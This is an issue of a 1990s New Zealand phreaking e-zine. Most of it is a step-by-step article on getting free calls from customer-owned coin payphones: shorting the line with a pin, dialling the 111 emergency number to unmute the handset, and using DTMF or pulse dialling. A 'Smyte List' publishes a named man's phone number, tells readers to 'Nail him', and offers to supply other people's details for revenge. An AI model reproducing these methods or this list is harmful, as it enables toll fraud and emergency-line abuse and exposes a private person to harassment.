-- Quit due to personal reasons. Telco: Well CyntaxEra's "misuse of a telephone" ooops has sorted itself out... BBS: Is finally UP AND running, but VERY private. It's located in Wellington, New Zealand. Email hacker_m@ix.wcc.govt.nz for information on the number and other miscellaneous info. OFFICIAL SLi BBS's ~~~~~~~~~~~~~~~~~~ (ie. run by SLi MEMBERS) BBS NAME MEMBER PHONE NUMBER/S SPEED MODEM Hacker's Haven BBS Thorium +64-6-844-DATA(+646 844 3282) 28.8k BPS * SLi BBS Eon +64-4-475-SCAN(+644 475 XXXX) 14.4k BPS !? * = Only online sometimes. ! = No K0d3z kiddies and NO Warez Puppies!! :) ? = Age limit of 17+. All files checked. UNIX system. 79Meg+ H/P/V files. NO Anarchy, NO Porn, NO Codez and NO Warez permitted on system! SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ COCOT Phreaking ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. COCOT Phreaking ~~~~~~~~~~~~~~~ For those of you who are reading this article without any previous knowledge of the common everyday COCOT, I'll begin by giving you a brief outline of this wonderfully strange object... [insert 'The Twilight Zone' movie soundtrack here] C ustomer O wned C oin O perated T elephone. There. Nothing to it. It's one of those small telephones you find in the old shopping mall - in most cases, if there happens to be a 'Telecom Card/Coin Phone' within a 3-metre radius, the chances of there being one around greatly decreases - or your handy service station. In the case of the latter suggest- ion, there'll almost always be an attendant keeping an eye out on you, but if they're slightly busy, they'll most probably be keeping there eyes out for other things. [Note: Telecom does know of the shortfalls of these fones, and warns their "clients" of the problems these fones have. So the attendants MIGHT know what's wrong with his/her fone and keep an eye out.] In the following, I'll just go over my 'observations' of these fones, and at- tempt to explain a bit about how they work - well, as far as I'm aware of, any- way. [Note: Considering the fact that New Zealand doesn't have the same 'Freedom of Speech' Act, as there is in the States, I'm a little wary of writing this article, so I'll try and keep the ideas to a minimum - that's all they are... ideas.] [Type One] Description: 'Blue-Buttoned Telephone'. [NOTE: If you try 'Idea One' you may be able to use any 'Blue-Buttoned' fone, but, if you are trying 'Idea Two', you must use the particular type which is listed below.] LCD Display shows a blinking 'COIN' which takes up the entire LCD display. When dialling, it doesn't bring up the number onto the display, but you SHOULD be able to hear it dialling. Major Colours: Blue, white, grey and black. [Idea One] Get a pin. Dial the number you want to call, push the pin through the wire, running from the fone into the wall, so it shorts the wires together thus making it impossible for the fone to disconnect. Hang up the fone and pick it back up. Dial '111' and pull the pin out. There you go - a free call. [Idea Two] Pick up the receiver and dial the number you want - as though you would nor- mally. It should dial the number for you, and if the line isn't busy, you should be put through okay. Once the person answers, dial '111' and it should free you from the mute - allowing you to speak freely with the person you have just called. If you get a 'no-such-number' answer, then perhaps there is a toll-bar on the phone line of the COCOT, otherwise, try another COCOT. [Explanation] With these 'blue-buttoned fones', you get your dial-tone and you're even per- mitted to use the keypad. The only problem... the microphone. The micro- phone is muted to stop the person from using the telephone and (from what I'm aware of) can only be 'de-muted' by the user of the telephone inserting a coin, OR dialling '111' [the emergency phone number in NZ - for those of you who are unfamiliar with the number]. After the numbers '111' are dialled - regardless of wether the phone has a dial-tone, or not - the microphone loses the 'mute button', and allows the user of the fone to speak into the microphone whilst allowing the receiver of the call to hear the caller. Of course, the receiver of the phone is un- changed, which allows the caller to hear the recipient of the call, to allow the caller to hear the dial-tone. [Type Two] Description: 'Brown-Buttoned Telephone' [NOTE: They have a big orange button with an 'A' on it.] These fones are becoming less common, but are still around. They have been replaced by either the 'blue-buttoned fone' or have an annoying 'beep' add- ed especially to help us fone phreaks out (NOT!). A few times, I have come across the odd one or two which have an interrupted dial-tone - a fake one which sticks around until you drop your dandy coin into the coin slot. Major Colours: Brown, orange, white and traces of black. [Idea One] Attain yourself a DTMF dialler and wander off to your nearest 'brown buttoned telephone'. Just put the dialler's microphone up to the UN-MUTED microphone on the telephone's receiver, and dial away. Once the person answers, begin to talk. =) [Explanation] The coin's only use appears to be to give the caller access to the dialling pad. Well, the older versions seem to give that appearance - seeming that there are newer versions hanging about with similar problems (ie. the false dial-tone). The outer casing (the telephone case) is the same and the only way to tell the difference is to try things out for yourself. This is a case of just hoping that you're lucky enough to find the ones which work. [Type Three] Description: 'The Red Phone' These are these rather big, rather OLD, rather chunky, rather, err, well, RED fones. they have a little red button on them that automatically dials '111'. Major Colours: Uh, a kinda RED colour. Has traces of white on the keypad for the numbers. [Idea One] The keypad is the only thing not connected so the ol' DTMF trick will work fine. They seem to be in a lot of T.A.B.'s [horse betting places for those of you who don't know that already]. Simple, aint it? [Idea Two] I assume you can also pulse dial using the switch-hook. For those who don't know how to use pulse-dialling, just tap the switch-hook down for a 'split-second' the number of times you need to dial the number with a space of silence between each number (so it knows when the next number is being dialled). It is a VERY old trick, but I thought I'd add it for those interested. [NOTE: These apply to NZ, but I can't remember what they are everywhere else and plus, I'm not going to type down ALL of the respective numbers!] Phone Number Number of times to press s-h 0 - 10 1 - 9 2 - 8 3 - 7 4 - 6 5 - 5 6 - 4 7 - 3 8 - 2 9 - 1 ie. Say you want to dial, 001-202-542-873, you would do this: tap the s-h 10 times, pause, 10, pause, 9, pause, 8, pause, 10, pause, 8, pause, 5, pause, 6, pause, 8, pause, 2, pause, 3, pause, 7. An easy way of remembering it, is to simply add the number to the amount of taps of the switch-hook and it should equal 10. This is an old idea, but it works on these old phones. SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Smyte List ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Well, as in all other SLi mags - except #1 - here's a person [and his info] who has done a pretty stupid thing, and got the members of SLi pissed at him. Name Info Reason --------------------+-------------------------+------------------------------ Johnathon Patterson +64-4-527-8021 Pissed CyntaxEra off - not to aka [-=[THE_FLY]=-] mention a LOT of other ppl. [Eon's note: This guy insulted Cyntax and I. He DESERVES ALL he GETS. Nail him.] [Note: If you have someone who has pissed you off lately, you want to 'get in touch' with them and think that we MIGHT have their info, just giz us a bell with your reason for getting back at this person and we'll see what we can do for ya.] SLi ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ ^^^^^ ^^^^^ ^^^^^ Editors Knotez ^^^^^ ^^^^^ ^^^^^ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Southern Lights inc. Damn it! Yet another one of these things! :) Ahh, well, me and Cyntax 'ave given up dak, Oh, yeah - Happy April Fools! :=) Well, it's the end of another SLi mag. Guess it's getting rather predict- able now. Well, SLi BBS PRIVATE NODE is up! Email hacker_m@ix.wcc.govt.nz if you want the number and instructions to login including the bbs passwd and stuff. Oh, BTW, it's 14.4... :) ALSO!!! if you want to send us a note, post it to our PO BOX. Here is the shout out you wanted MysTix! PS. SLi V should be out in 3-4 months. Yeah someone wrote me asking if there was a way to turn off call waiting. Now, I think it's *52. Oh, and I'd like to say TELECOM RISK MANAGEMENT (aka. Telco security) isn't that bad. Hey, I'd even accept some feedback from them. :) Anyone wanna write me a letter? I'm sure you can find my address :\ I take that back. I'll just say, "tnx Heather" :-< [Maybe I was wrong. They just killed Cyntax's 3-Way and stuff cause of her VMB "ooops". So be it.] God, that Bill Gates guy is a s[h]muck! What an _elite_ haircut he has! And, the glasses! Yuck! Oh, god! Look at the tie!! Yellow and black rectangles! Of course this is MY opinion and may not be that of the civilized world [CyntaxEra's Note: Apologies go out to any people reading this who have that tie - we're very sorry for you. ;)] Another Tip: SLi uses 2048 bit encryption on our IMPORTANT junk, and 512 on our misc stuff - thanks to PGP 2.4x . Any BBS's that would like to become an OFFICIAL SLi release point, please POST a letter to the SLi PO Box, or email me: HACKER_M@IX.WCC.GOVT.NZ. A Final NOTE: We are ALL New Zealanders - not black, not white but united under ONE flag. We are one nation. May we once again become one people. Our flag is the symbol of our country, to all who spit on it, to all who stomp on it. Take note that thousands died for that flag - both white and black! Do not EVER stand on, or deface, OUR symbol of OUR country, for we are ONE people united. If you wish to show your disaproval, do it in a rightous and honourable way. Not in such a childish and immature way without any fore-thought at all. [This is in accordance to the current disagreements between NZ and a small percentage of Maori New Zealanders in reference to this year's Waitangi Day - A day which should have been celebrated by all. Sadly the acts of a few have made this country two people under one divided flag. Be ashamed of yourself all who took part in the division of New Zealand, for these acts will live in the history of New Zealand forever as the day New Zealanders became two peoples.] Well, I'll see you all 'round... 'Till next time... . Life is Cursed. For all who live must die. eof